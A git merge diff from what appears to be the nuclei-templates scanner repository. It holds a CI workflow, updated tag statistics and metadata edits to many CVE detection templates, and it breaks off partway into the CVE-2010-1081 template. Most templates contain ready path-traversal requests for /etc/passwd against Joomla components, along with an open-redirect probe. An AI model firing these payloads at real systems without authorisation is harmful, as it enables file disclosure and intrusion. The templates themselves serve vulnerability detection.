Merge branch 'projectdiscovery:master' into master
commit
b9efa77da3
|
@ -0,0 +1,30 @@
|
|||
name: 📑 Template-DB Indexer
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
- name: Intalling Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
cd nucleish-api/cmd/generate-index/
|
||||
go install
|
||||
|
||||
- name: Generate Index
|
||||
env:
|
||||
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||
run: |
|
||||
generate-index -mode templates
|
||||
generate-index -mode changelog
|
|
@ -10,7 +10,6 @@
|
|||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 955 | daffainfo | 529 | cves | 961 | info | 991 | http | 2660 |
|
||||
| lfi | 400 | dhiyaneshdk | 360 | exposed-panels | 381 | high | 730 | file | 57 |
|
||||
| panel | 383 | pikpikcu | 295 | vulnerabilities | 377 | medium | 544 | network | 48 |
|
||||
| xss | 296 | pdteam | 240 | technologies | 214 | critical | 353 | dns | 16 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 273 | dwisiswant0 | 159 | workflows | 182 | | | | |
|
||||
| rce | 251 | gy741 | 98 | misconfiguration | 182 | | | | |
|
||||
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| cve2021 | 211 | 0x_akoko | 94 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
|
||||
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
|
||||
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
|
||||
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
|
||||
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
|
||||
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
|
||||
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
|
||||
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
|
||||
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
|
||||
|
||||
**203 directories, 2995 files**.
|
||||
**212 directories, 3054 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
2453
TEMPLATES-STATS.md
2453
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 955 | daffainfo | 529 | cves | 961 | info | 991 | http | 2660 |
|
||||
| lfi | 400 | dhiyaneshdk | 360 | exposed-panels | 381 | high | 730 | file | 57 |
|
||||
| panel | 383 | pikpikcu | 295 | vulnerabilities | 377 | medium | 544 | network | 48 |
|
||||
| xss | 296 | pdteam | 240 | technologies | 214 | critical | 353 | dns | 16 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 273 | dwisiswant0 | 159 | workflows | 182 | | | | |
|
||||
| rce | 251 | gy741 | 98 | misconfiguration | 182 | | | | |
|
||||
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| cve2021 | 211 | 0x_akoko | 94 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
|
||||
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
|
||||
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
|
||||
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
|
||||
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
|
||||
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
|
||||
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
|
||||
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
|
||||
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
|
||||
|
|
|
@ -4,9 +4,14 @@ info:
|
|||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
remediation: There is currently no patch available.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 6.5
|
||||
cwe-id: CWE-276
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/01/26
|
||||
|
|
|
@ -643,7 +643,7 @@
|
|||
"author": "forgedhallpass",
|
||||
"links": {
|
||||
"github": "https://www.github.com/forgedhallpass",
|
||||
"twitter": "",
|
||||
"twitter": "https://twitter.com/forgedhallpass",
|
||||
"linkedin": "",
|
||||
"website": "",
|
||||
"email": ""
|
||||
|
|
|
@ -5,10 +5,13 @@ info:
|
|||
author: r3naissance
|
||||
severity: low
|
||||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
tags: cve,cve2000,frontpage,microsoft
|
||||
classification:
|
||||
cve-id: CVE-2000-0114
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,3 +28,6 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
||||
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -6,6 +6,7 @@ info:
|
|||
severity: high
|
||||
tags: network,ssh,openssh,cves,cves2001
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
|
@ -24,3 +25,5 @@ network:
|
|||
- type: word
|
||||
words:
|
||||
- "SSH-1"
|
||||
|
||||
# Updated by Chris on 2022/01/21
|
||||
|
|
|
@ -4,9 +4,14 @@ info:
|
|||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||
reference: https://www.exploit-db.com/exploits/24068
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/24068
|
||||
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
|
||||
tags: xss,squirrelmail,cve2004,cve
|
||||
classification:
|
||||
cve-id: CVE-2004-0519
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -28,3 +33,7 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -1,13 +1,19 @@
|
|||
id: CVE-2005-2428
|
||||
info:
|
||||
name: CVE-2005-2428
|
||||
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
tags: cve,cve2005
|
||||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
|
||||
tags: cve,cve2005,domino
|
||||
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
|
||||
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
|
||||
reference:
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2005-2428
|
||||
cwe-id: CWE-200
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -21,5 +27,7 @@ requests:
|
|||
- type: regex
|
||||
name: domino-username
|
||||
regex:
|
||||
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/02/02
|
||||
|
|
|
@ -4,11 +4,14 @@ info:
|
|||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
classification:
|
||||
cve-id: CVE-2008-6172
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2009-5020
|
||||
info:
|
||||
name: AWStats < 6.95 - Open Redirect
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2009-5020
|
||||
tags: cve,cve2020,redirect,awstats
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2009-5020
|
||||
cwe-id: CWE-601
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
|
||||
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2009-5114
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0157
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
remediation: Upgrade to a supported version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0157
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,32 +1,29 @@
|
|||
id: CVE-2010-0467
|
||||
|
||||
info:
|
||||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
remediation: Apply all relevant security patches and upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.80
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
remediation: Upgrade to a supported version.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0696
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0759
|
||||
|
||||
info:
|
||||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0759
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0942
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jvideodirect - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0942
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0942
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0943
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11090
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0943
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0944
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jcollection - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0944
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0972
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11738
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0972
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0972
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0982
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0982
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-0985
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10948
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0985
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-0985
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-1056
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1056
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
classification:
|
||||
cve-id: CVE-2010-1056
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
id: CVE-2010-1081
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
